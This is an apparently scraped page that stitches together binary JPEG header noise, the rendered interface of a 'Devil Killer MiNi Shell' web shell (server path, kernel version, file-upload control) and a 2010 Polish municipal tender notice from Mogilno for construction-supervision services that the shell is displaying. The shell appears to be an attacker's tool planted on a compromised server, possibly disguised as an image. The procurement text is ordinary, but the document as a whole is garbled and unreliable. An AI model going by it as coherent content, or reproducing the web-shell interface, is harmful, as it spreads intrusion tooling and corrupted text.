JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100312/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100312/55059-N-2010.html

<p class="kh_header"><b>Mogilno: Wykonywanie usług w zakresie nadzoru inwestorskiego w ramach zadania: Budowa hali widowiskowo - sportowej w Mogilnie wraz ze sfinansowaniem poprzez wykup wierzytelności z możliwością uzyskania finansowania do wysokości 30 % wartości robót budowlanych ze środków budżetu Woj. Kuj.- Pom. w związku z ujęciem zadania w Katalogu Potrzeb Bazy Sportowej Województwa Kujawsko - Pomorskiego do roku 2015.</b><br>
<b>Numer ogłoszenia: 55059 - 2010; data zamieszczenia: 12.03.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mogilno , ul. Narutowicza 1, 88-300 Mogilno, woj. kujawsko-pomorskie, tel. 052 3185520, faks 052 3152693.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonywanie usług w zakresie nadzoru inwestorskiego w ramach zadania: Budowa hali widowiskowo - sportowej w Mogilnie wraz ze sfinansowaniem poprzez wykup wierzytelności z możliwością uzyskania finansowania do wysokości 30 % wartości robót budowlanych ze środków budżetu Woj. Kuj.- Pom. w związku z ujęciem zadania w Katalogu Potrzeb Bazy Sportowej Województwa Kujawsko - Pomorskiego do roku 2015..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest nadzór inwestorski branży budowlanej, instalacyjnej w zakresie sieci, instalacji i urządzeń wentylacyjnych, elektrycznych, wodociągowych, kanalizacyjnych, cieplnych, drogowych i telekomunikacyjnych, w ramach zadania pn: Budowa hali widowiskowo - sportowej w Mogilnie wraz ze sfinansowaniem poprzez wykup wierzytelności z możliwością uzyskania finansowania do wysokości 30 % wartości robót budowlanych ze środków budżetu Woj. Kuj.- Pom. w związku z ujęciem zadania w Katalogu Potrzeb Bazy Sportowej Województwa Kujawsko - Pomorskiego do roku 2015.
    Zakres robót budowlanych obejmuje budowę hali widowiskowo - sportowej będącej, częścią kompleksu sportowo - rekreacyjnego (w skład którego wpisuje się budynek hali widowiskowo - sportowej, budynek kręgielni oraz budynek hotelu) w rejonie ulic Niezłomnych i Grobla w Mogilnie. Projektowany obiekt jest II kondygnacyjny, niepodpiwniczony, z dachem płaskim o kącie nachylenia połaci dachowej 3° i 5°. Zaprojektowano obsługę komunikacyjną działki, wjazdu od ul. Grobla i ul. Niezłomnych oraz miejsca parkingowe. 
Sala sportowa z płytą boiska o wymiarach 25,00 m x 47,00 m, wysokości 12,5 m, umiejscowiona zostanie w centralnej części budynku. Ponadto w budynku zaprojektowano na parterze 4 zespoły szatniowo- sanitarne, pokój lekarski, pokój pierwszej pomocy, salę treningową, magazyny, pomieszczenia techniczne, komunikację, sanitariaty dla publiczności, szatnie dla publiczności. Na piętrze zaprojektowano pomieszczenia techniczne, trybuny dla publiczności, kawiarnię z zapleczem. 
Budynek hali będzie obiektem przeznaczonym do zajęć sportowych  i organizowania imprez rekreacyjnych masowych. Funkcjonalnie całość podzielona będzie na główną salę z trybunami stałymi na 880 miejsc (podzieloną na 14 sektorów), do których dostęp zapewniony zostanie z poziomu piętra oraz poprzez odrębny węzeł szatniowo -  sanitarny dla publiczności. Połączenie funkcjonalne pomiędzy parterem, a piętrem zapewniać będą klatki schodowe. Obiekt w pełni spełniać będzie wymogi dostępności dla osób niepełnosprawnych poprzez m.in.: sanitariaty, platformę dla niepełnosprawnych, szatnię przystosowaną dla osób niepełnosprawnych.
Dach hali zaprojektowano na konstrukcji drewnianej  o rozpiętości 41,5 m w osi, rozstaw dźwigarów co 6,00 m, długość hali 60,0 w osi hali, kąt spadku 5°. Przykrycie z płyty warstwowej z rdzeniem poliuretanowym grubości 10 cm (łączna grubość płyty z warstwami okładziny 14 cm). Rozstaw płatwi przyjęto co 2,56 m.
Strop nad piętrem zaprojektowano jako gęstożebrowy typu Teriva II, natomiast nad parterem typu Teriva III. Wieńce na ścianach nośnych  i samonośnych z betonu B20, nadproża nadokienne i drzwiowe typowe z belek typu L-19. 
  Ściany zewnętrzne nośne i samonośne podziemia z bloczków betonowych, nadziemne murowane z pustaków ceramicznych, ocieplane od zewnątrz styropianem. Ściany działowe projektowane są z pustaków ceramicznych, tynkowane tynkiem gipsowym nakładanym mechanicznie, malowane farbą emulsyjną. W sanitariatach okładziny z glazury do wysokości 2,00 m. W pomieszczeniu hali sportowej do wysokości 3,64 m licząc od poziomu piętra ściany wyłożone płytami akustycznymi.
Zaprojektowano sufity tynkowane tynkiem gipsowym na mokro malowane dwukrotnie farbą emulsyjną natryskową, nakładaną mechanicznie. Sufit hali sportowej wykonany zostanie z płyt akustycznych.
Na posadzkach zaprojektowano płytki ceramiczne, wykładziny homogeniczne, wykładziny heterogeniczne, podłogi sportowe i system posadzkowy na bazie żywic.
W budynku przewiduje się montaż okien i drzwi zewnętrznych aluminiowych z szybami bezpiecznymi, stolarki drzwiowej wewnętrznej typowej.
Przewiduje się wykonanie elewacji w technologiach takich jak: tynk cienkowarstwowy (polimerowo - mineralny), malowany farbami silikonowymi okładziny elewacyjne drewnopodobne, grubości 4mm, ognioodporne (materiał niepalny, niekapiący i nieodpadający pod wpływem ognia) cegiełkę elewacyjną łamaną, betonową z betonu z wykorzystaniem kruszyw mineralnych.
Zamówienie przewiduje wykonanie przyłączy wodno - kanalizacyjnch, centralnego ogrzewania i kanalizacji deszczowej oraz instalacje wewnętrzne wodno-kanalizacyjne, centralnego ogrzewania, instalacje zasilania nagrzewnic, instalacje wentylacyjną, odwodnienie dachu.
Ponad to zakres prac przewiduje wykonanie  instalacji  nagłośnieniowej, telewizyjno-komputerowej, elektroenergetycznej, system sygnalizacji pożaru, system sygnalizacji i włamania i napadu, system dozoru telewizji użytkowej.
Powierzchnia użytkowa budynku  hali wynosi 6 676,92 m2, powierzchnia zabudowy - 5 117,57 m2, kubatura - 43 668,03 m3.
Drogi dojazdowe, chodniki, parkingi wykonane zostaną z kostki betonowej o grubości 6 i 8 cm w zależności od przeznaczenia. Projekt zagospodarowania terenu przewiduje szereg nasadzeń drzew i krzewów.

2.Szczegółowy zakres robót budowlanych, objętych usługą nadzoru inwestorskiego  określają  Przedmiar robót oraz Projekt budowlany i wykonawczy (dostępny w siedzibie Zamawiającego pokój nr 210 oraz na stronie internetowej www.bip.mogilno.pl w związku z prowadzonym postępowaniem przetargowym na roboty budowlane przedmiotowego zadania tj. Budowa hali widowiskowo - sportowej w Mogilnie wraz ze sfinansowaniem poprzez wykup wierzytelności z możliwością uzyskania finansowania do wysokości 30 % wartości robót budowlanych ze środków budżetu Woj. Kuj.- Pom. w związku z ujęciem zadania w Katalogu Potrzeb Bazy Sportowej Województwa Kujawsko - Pomorskiego do roku 2015)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>W przypadku udzielenia wykonawcy robót budowlanych objętych usługą nadzoru inwestycyjnego, stanowiącą przedmiot niniejszego postępowania robót dodatkowych, Zamawiający przewiduje udzielenie Wykonawcy zamówienia na usługi uzupełniającej, w trybie art. 67 ust. 1 pkt.6 Pzp.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.00.00-2, 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 30.04.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Warunki wpłaty i zwrotu wadium
WYSOKOŚĆ WADIUM.
1) Oferta musi być zabezpieczona wadium w wysokości:
5.000,00 PLN (słownie: pięć tysięcy złotych).
FORMA WADIUM.
2)Wykonawca może wnieść wadium w:
a)	pieniądzu,
b)	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo kredytowej,
c)	gwarancjach bankowych,
d)	gwarancjach ubezpieczeniowych,
e)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109, poz. 1158 oraz z 2002 r. Nr 25, poz. 253, Nr 66, poz. 596 i Nr 216, poz. 1824).
3)W przypadku składania przez Wykonawcę wadium w formie gwarancji, gwarancja
powinna być sporządzona zgodnie z obowiązującym prawem i winna zawierać
następujące elementy:
a)	nazwę dającego zlecenie (Wykonawcy), beneficjenta gwarancji (Zamawiającego), gwaranta (banku lub instytucji ubezpieczeniowej udzielających gwarancji) oraz wskazanie ich siedzib,
b)	określenie wierzytelności, która ma być zabezpieczona gwarancją,
c)	kwotę gwarancji,
d)	termin ważności gwarancji,
e)	zobowiązanie gwaranta do: zapłacenia kwoty gwarancji na pierwsze pisemne żądanie Zamawiającego zawierające oświadczenie, iż Wykonawca, którego ofertę wybrano: odmówił podpisania umowy na warunkach określonych w ofercie, lub nie wniósł zabezpieczenia należytego wykonania umowy, lub zawarcie umowy stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
4)W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany
wpłacić wadium przelewem na rachunek :

Bank  Millenium SA- Nr rachunku  51 1160 2202 0000 0000 6088 7659

(ksero przelewu dołączyć do oferty) z dopiskiem:

Wykonywanie usług w zakresie nadzoru inwestorskiego na zadaniu:
Budowa hali widowiskowo - sportowej w Mogilnie wraz ze sfinansowaniem poprzez wykup wierzytelności z możliwością uzyskania finansowania do wysokości 30 % wartości robót budowlanych ze środków budżetu Woj. Kuj.- Pom. w związku z ujęciem zadania w Katalogu Potrzeb Bazy Sportowej Województwa Kujawsko - Pomorskiego do roku 2015.

5)Wadium wniesione w pieniądzu zamawiający przechowuje na rachunku bankowym.
6)Wadium wnoszone w innej formie niż pieniądzu należy w oryginale załączyć do oferty.
7)Oferta niezabezpieczona akceptowalną formą wadium spowoduje wykluczenie Wykonawcy.

8)Wadium należy wnieść najpóźniej w terminie wyznaczonym na złożenie oferty tj. do dnia 22 marca 2010r., do godz. 10:00 
9)Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w wyznaczonym terminie składania ofert znajduje się na koncie Zamawiającego.
10) Wadium wniesione w formie innej niż pieniężna musi zachowywać ważność przez okres związania ofertą tj. 30 dni.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia , mogą ubiegać się wykonawcy, którzy spełniają warunki określone w art. 22 ust.1 ustawy Prawo zamówień publicznych tj.:
1) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy 
    nakładają obowiązek posiadania takich uprawnień;
2) posiadają wiedzę i doświadczenie oraz dysponują odpowiednim potencjałem technicznym i 
    osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie  
    innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
    zamówienia;
3) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia;
4) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 
    ust. 1 i ust. 2 pkt. 1-3 ustawy Prawo zamówień publicznych.
2. Zamawiający, realizując swoje prawo, a zarazem obowiązek doprecyzowania warunków udziału w postępowaniu (określonych w sposób ogólny w art. 22 ust. 1 ustawy Prawo zamówień publicznych i przytoczonych za wzmiankowaną ustawą w pkt. 1 niniejszej SIWZ), wymaga, aby Wykonawcy ubiegający się o udzielenie zamówienia publicznego, którego dotyczy niniejsza SIWZ spełniali następujące wymogi.

Opis sposobu dokonywania oceny spełniania warunków udziału w postępowaniu:
1. Ocena spełniania warunków udziału w postępowaniu zostanie dokonana zgodnie z
formułą spełnia / nie spełnia w oparciu o oświadczenia i dokumenty załączone do oferty, z zastrzeżeniem art. 26 ust. 3 i 4 ustawy Prawo zamówień publicznych.

2. Informację o oświadczeniach i dokumentach jakie winni dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu zawiera część 9 niniejszej SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Złożyli Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, minimum 2 usług polegających na pełnieniu funkcji Inżyniera Kontraktu/Inwestora zastępczego kontraktu lub inspektora nadzoru, przy budowie budynku, o powierzchni użytkowej minimum 3.000 m2, i wartości wykonanych robót budowlanych powyżej 10.000.000 zł brutto w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu,  dat    wykonania i odbiorców, oraz załączeniem  dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - Załącznik nr 4 do SIWZ - Wykaz wykonanych usług;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zdolność techniczna.
W celu potwierdzenia spełniania warunków udziału w postępowaniu, w zakresie posiadania wiedzy i doświadczenia oraz dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania niniejszego zamówienia Wykonawca musi spełniać następujące warunki (w przypadku wspólnego ubiegania się dwóch lub więcej Wykonawców o udzielenie niniejszego zamówienia, oceniany będzie ich łączny potencjał techniczny i kadrowy oraz łączne doświadczenie):
1)	Wykonawca musi potwierdzić należyte wykonanie w okresie ostatnich trzech lat
przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest
krótszy - w tym okresie, minimum 2 usług polegających na pełnieniu funkcji
Inżyniera Kontraktu/Inwestora zastępczego kontraktu lub inspektora nadzoru,
każda - przy budowie budynku, o powierzchni użytkowej minimum 3.000 m2, i wartości wykonanych robót budowlanych powyżej 10.000.000 zł brutto.
 W tym celu wykonawca załączy do oferty:
-   Wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, minimum 2 usług polegających na pełnieniu funkcji Inżyniera Kontraktu/Inwestora zastępczego kontraktu lub inspektora nadzoru, przy budowie budynku, o powierzchni użytkowej minimum 3.000 m2, i wartości wykonanych robót budowlanych powyżej 10.000.000 zł brutto, w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te usługi zostały wykonane lub są wykonywane należycie - Załącznik nr 4 do SIWZ- Wykaz wykonanych usług;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniane będzie łącznie).
2)	Wykonawca musi dysponować osobami zdolnymi do wykonania zamówienia,
spełniającymi następujące wymogi:
A)	KIEROWNIK  ZESPOŁU
Wykształcenie  wyższe  techniczne.  Uprawnienia  do  wykonywania  samodzielnych
funkcji technicznych w budownictwie - do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń; doświadczenie zawodowe w kierowaniu lub koordynowaniu prac zespołu nadzorującego roboty budowlane - co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
B)	INSPEKTOR NADZORU BRANŻY OGÓLNOBUDOWLANEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie - do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń; doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w zakresie robót konstrukcyjno-budowlanych, lub kierownika robót w specjalności konstrukcyjno-budowlanej, co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa
C)	INSPEKTOR NADZORU BRANŻY ELEKTRYCZNEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie - do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
D)	INSPEKTOR NADZORU BRANŻY SANITARNEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w
budownictwie - do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, wodociągowych i kanalizacyjnych bez ograniczeń; Doświadczenie zawodowe w pełnieniu funkcji kierownika budowy, lub inspektora nadzoru inwestorskiego w zakresie robót instalacyjnych w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych,  wodociągowych i kanalizacyjnych, lub kierownika robót w specjalności instalacyjnej w zakresie sieci instalacji i urządzeń cieplnych, wentylacyjnych, , wodociągowych i kanalizacyjnych, co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.

E) INSPEKTOR NADZORU BRANŻY DROGOWEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie w specjalności drogowej, oraz członkostwo w Okręgowej Izbie Inżynierów Budownictwa,  doświadczenie zawodowe w nadzorowaniu robót budowlanych lub kierowaniu budową związane z budową dróg lub odbudową nawierzchni drogowych. 
W tym celu wykonawca załączy do oferty:
a)	Wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu
zamówienia, w szczególności odpowiedzialnych za świadczenie usług, wraz z
informacjami na temat ich kwalifikacji zawodowych, doświadczenia i
wykształcenia niezbędnych do wykonania zamówienia , a także zakresu
wykonywanych przez nich czynności oraz informacją o podstawie
dysponowania tymi osobami (wzór Wykazu osób stanowi Załącznik nr 5 do
niniejszej SIWZ;
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniane będzie łącznie).
b)	do wykazu należy dołączyć wymagane uprawnienia budowlane wskazanych
w Wykazie osób, które będą uczestniczyć w wykonywaniu zamówienia oraz
aktualne zaświadczenia o przynależności wskazanych w Wykazie osób do
właściwej Izby Inżynierów Budownictwa (nie dot. specjalisty ds. akustyki
oraz specjalisty ds. oświetlenia).
(w przypadku wspólnego ubiegania się o udzielenie niniejszego zamówienia przez dwóch lub więcej Wykonawców spełnienie powyższego warunku oceniane będzie łącznie).
Wykonawca może polegać na zasobach innych podmiotów, w zakresie: wiedzy i doświadczenia, potencjału technicznego oraz osób zdolnych do wykonania zamówienia.
Jeżeli Wykonawca polega na zasobach innych podmiotów w zakresie: wiedzy i doświadczenia, osób zdolnych do wykonania zamówienia, zobowiązany jest dowieść Zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonaniu zamówienia.
Wszystkie dokumenty należy złożyć w oryginale lub kopii poświadczonej za zgodność z oryginałem przez Wykonawcę.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykazali dysponowanie   osobami   zdolnymi   do   wykonania   zamówienia,   spełniającymi następujące wymogi:
A)	KIEROWNIK  ZESPOŁU
Wykształcenie  wyższe  techniczne.  Uprawnienia  do  wykonywania  samodzielnych
funkcji technicznych w budownictwie - do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń; doświadczenie zawodowe w kierowaniu lub koordynowaniu prac zespołu nadzorującego roboty budowlane - co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
B)	INSPEKTOR NADZORU BRANŻY OGÓLNOBUDOWLANEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie - do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej bez ograniczeń; doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w zakresie robót konstrukcyjno-budowlanych, lub kierownika robót w specjalności konstrukcyjno-budowlanej, co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
C)	INSPEKTOR NADZORU BRANŻY ELEKTRYCZNEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w budownictwie - do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń; doświadczenie zawodowe w pełnieniu funkcji kierownika budowy lub inspektora nadzoru inwestorskiego w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, lub kierownika robót w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych, co najmniej 5 lat od momentu uzyskania uprawnień bez ograniczeń. Osoba ta musi należeć do właściwej Izby Inżynierów Budownictwa.
D)	INSPEKTOR NADZORU BRANŻY SANITARNEJ
Uprawnienia budowlane do wykonywania samodzielnych funkcji technicznych w
